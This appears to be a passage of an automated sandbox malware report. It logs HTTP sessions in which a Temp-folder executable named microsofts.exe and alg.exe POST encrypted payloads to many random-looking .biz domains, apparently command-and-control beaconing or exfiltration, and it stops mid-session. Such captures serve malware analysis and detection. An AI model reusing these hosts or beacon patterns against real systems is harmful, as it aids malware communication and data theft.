                                                                                                                                                                                                                                                                                                                                                                                                              86192.168.2.55975513.251.16.150801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.036928892 CET351OUTPOST /xjfegb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.036928892 CET828OUTData Raw: 05 65 61 c7 79 e7 83 aa 30 03 00 00 7d 49 f9 cf f8 75 be 80 48 ea d7 02 45 4b e6 62 33 50 ae ae 06 ff 76 60 a3 5a 47 a1 71 fc 82 33 0f 83 c5 95 9c d9 c5 e6 b2 27 fb ee b5 db 97 29 fd 66 6a c5 94 ef e8 39 8c 5f fc f9 73 eb 15 c2 98 ce 8a 28 85 6d
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: eay0}IuHEKb3Pv`ZGq3')fj9_s(m<JFhK11St+XB7Od|Ns<pTY:`<xW;=s[Gw.neGt|+SK?i(rtgu/%kyH~uS |yrp:
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.489908934 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=52bfb23bbad96c53429ce58a91cd37fb|173.254.250.76|1730822643|1730822643|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              87192.168.2.55975685.214.228.140801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.583544016 CET346OUTPOST /ls HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.583578110 CET778OUTData Raw: e0 99 82 f8 b4 1c 3c 40 fe 02 00 00 3d 9f 66 7e 25 c2 39 16 07 50 8f de d5 84 c1 0d 90 1b 8e 55 22 f9 e7 0f 5e 96 22 4e bf 27 9e f3 67 1b 6d d1 9a 9c 3b 64 2e 32 c2 ed 9b cf 00 79 e3 72 36 e3 95 b2 82 86 2f 17 03 a9 28 88 32 95 d7 46 0a e1 ed 64
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <@=f~%9PU"^"N'gm;d.2yr6/(2FdeZv9"93&6wQ_(Zq54n/"ye`;%],[8+c68}`4#'e5h<1|xgSRnPyVc{K?1I ^>iw
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.450649023 CET166INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.27.2
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                              Keep-Alive: timeout=20
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              88192.168.2.55975734.211.97.45801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.530846119 CET352OUTPOST /gyyihnqs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.530874968 CET828OUTData Raw: a3 ba 6f 97 ba 31 1b 9d 30 03 00 00 42 a1 e9 da 81 4f fe 17 ed 2e 3f 09 bc 25 d6 1e 49 13 d6 8b ae 9f 21 14 0b e3 7c af cd 7a 82 2c 91 6b 93 0e 75 f6 01 ac 07 ba 43 8c df 9b 3e 9f ac 60 44 e5 60 1f 2a 03 42 c0 d4 30 99 61 f3 12 01 5e 82 ef a4 c1
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: o10BO.?%I!|z,kuC>`D`*B0a^5$09GbSm9IBF^|7]kNCZto|U-0GcX2EDFra=RoG}N5z%{&3y,b\'#USyh-pY
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.363642931 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=8fc85a84711b035a3bd3e03320872b8c|173.254.250.76|1730822644|1730822644|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              89192.168.2.55975847.129.31.212801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.707349062 CET358OUTPOST /obphwwtyxwxyphq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.707367897 CET778OUTData Raw: cd a0 1e b2 01 5e 19 64 fe 02 00 00 d1 e2 7f ad fe 81 ae e2 56 f7 ef 2d 31 d5 9b 4a 3a 31 86 dd a5 b8 be fe 64 93 6a ef cd 16 6a b3 60 67 b7 1b 6c 26 ff 41 5b c5 b6 4c c0 b3 d6 78 b9 d3 dd c7 b1 fb fb 39 d9 d6 b1 ce 4b de 54 4c c0 3c 3e 72 f7 0e
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ^dV-1J:1djj`gl&A[Lx9KTL<>rU"OG}{Ja4JNE069n5Y*WLO8I_"Vzeggq<2g1SU0dEpR]CsH[[.l`^0(F=)NQRS^kVfSHh{
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.142234087 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=6965190167a1d93a06a112f8c0a71c17|173.254.250.76|1730822644|1730822644|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              90192.168.2.55975947.129.31.212801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.427057028 CET354OUTPOST /olsalbtppedg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.427057028 CET828OUTData Raw: fc de a6 79 2c 7c 81 03 30 03 00 00 81 7b 6f 31 bc 3f e0 12 bc c0 d5 fa f9 42 8e 7c bf 16 5d 54 ae 87 a0 a9 87 18 b8 64 eb f6 fa 84 fc ec 11 e2 6c 60 c5 76 c2 27 c7 78 fc f6 1f 3d 6a 60 e1 53 54 1f 4c b9 08 d8 1f 8c a3 4e 16 d9 c6 1e c5 1b 80 b4
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: y,|0{o1?B|]Tdl`v'x=j`STLN'g7h,3'i6T5WW_o,lstul|zpx_=_9"(DD39aa%ZPZLj>vXZ#{o{'/JNVmdoT]W
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.847815037 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=785043b03717d5d3c8f0aabdaf89e7a9|173.254.250.76|1730822645|1730822645|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              91192.168.2.55976134.211.97.45801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.679887056 CET355OUTPOST /bwancadkaqtlbx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.679903030 CET778OUTData Raw: 68 2e cf 3f 65 41 b9 5d fe 02 00 00 77 60 92 9d d9 e7 a5 89 cc 9d a7 26 7b e1 07 77 a9 69 08 f6 8e 2d e7 ae 70 43 b1 ee 32 82 a7 a3 d6 6c 04 08 12 4b e3 c5 8d bc ba fe 24 07 eb 2a fb 17 b9 7e a6 16 56 b1 b8 21 67 f3 07 22 67 4e 12 05 0f e9 17 f4
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: h.?eA]w`&{wi-pC2lK$*~V!g"gN=a/k4\O8>wo)ov%;l\R,5x*ixKX=sd3@&td|xLD^J>jH }% ]i}@Rbg/
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:06.510561943 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=9f5c94f42361fd15ce7f2abb6aec767f|173.254.250.76|1730822646|1730822646|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              92192.168.2.55976213.251.16.150801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.906404972 CET351OUTPOST /fanvkuxv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.906457901 CET828OUTData Raw: 67 70 c3 b5 92 90 c3 d3 30 03 00 00 80 7d 87 db 8d 0b ec 60 75 b2 bb 22 fa 08 12 7d f9 a3 16 ea f3 b8 68 60 0b 56 25 42 5c a8 df 2a fd a8 33 6c e3 0e 12 37 95 74 23 04 f1 1e e1 2a f1 8b 99 fd 4a bb 39 79 b8 f9 7b 5b 4b 52 74 bd 1a 53 6d 95 64 c0
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: gp0}`u"}h`V%B\*3l7t#*J9y{[KRtSmd%/{NbmT;`nw)taT.|co6%rH[>U 9bQz~41d`Bbo9LH#Gi6|sQS<$
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:07.326438904 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=fadd5a24bc023f7c2e78b09ba5e8cbce|173.254.250.76|1730822647|1730822647|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              93192.168.2.55976347.129.31.212801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:06.875323057 CET344OUTPOST /ix HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:06.875462055 CET778OUTData Raw: db e8 18 ef e7 77 91 55 fe 02 00 00 75 fe 3b 0c 15 80 6c 74 58 93 e3 0c c4 d8 78 12 50 bd d8 00 aa 93 54 b1 cd ff 39 73 97 1a 5d 5d e2 e1 30 29 fb cd cb 2e 7c 59 24 08 10 a7 40 15 7b 46 40 24 29 31 6d a1 9f 93 13 ba 91 d8 44 44 33 ac 3a 11 2e 39
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: wUu;ltXxPT9s]]0).|Y$@{F@$)1mDD3:.9|?vIFN!$VobpLfpMKt.2@_V7>CUdkCB-lQp~5:Odp%1C$&YWn=h@S/?^L
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.312319040 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=2af0a33e88815192272d3293c40d2c45|173.254.250.76|1730822648|1730822648|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              94192.168.2.55976434.211.97.45801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:07.371391058 CET354OUTPOST /vxsjaatihrjtd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:07.371409893 CET828OUTData Raw: ec bd 42 3a 69 87 5b c7 30 03 00 00 0a 6a 10 e6 51 5c cb f1 7e 93 13 b6 68 94 52 c4 7c 4e 21 cd 93 2c f0 32 58 07 be 34 a3 cf ab f6 8b fe 86 9f cc 75 eb 41 2c 81 7b 58 46 ec cc b4 65 86 6a dc ed 38 9b 45 05 17 c6 d7 22 c9 34 e1 38 f1 8d bc 27 6e
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: B:i[0jQ\~hR|N!,2X4uA,{XFej8E"48'n%@;4.F1Mt04l=I*H;cTKx<tPe9Pj9*9\[1&j<4Ei9Q"NO"B:kIXQ`8ZmR[Q
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.215600014 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=44aedcfaca3602994e6a7480febc9409|173.254.250.76|1730822648|1730822648|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              95192.168.2.5597653.94.10.34801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.254694939 CET353OUTPOST /qvkbehfy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.254714012 CET828OUTData Raw: fc 25 9f 3f 68 3e 7b 7c 30 03 00 00 f8 c8 1a 16 bc 08 27 57 f6 d9 85 a7 20 86 d7 25 b2 a9 17 2d ee 46 57 f4 1f f3 22 bd 16 ab 08 54 da e3 57 2a ce f1 d9 da bb cf 56 62 07 46 14 bc 46 fd 1b ba ba 70 b6 43 3f 6f a5 cf b1 2b 32 c9 07 1b 35 a3 34 3b
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: %?h>{|0'W %-FW"TW*VbFFpC?o+254;]#z1l@<DlKt|$ih>`kana(9|4ofU\"AqQg#^4(&O%?]M3gtJ45&I[;KZwd""
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.916470051 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=d7c9d86b5a0aabbce9c5b8b1ea84760e|173.254.250.76|1730822648|1730822648|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              96192.168.2.55976618.208.156.248801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
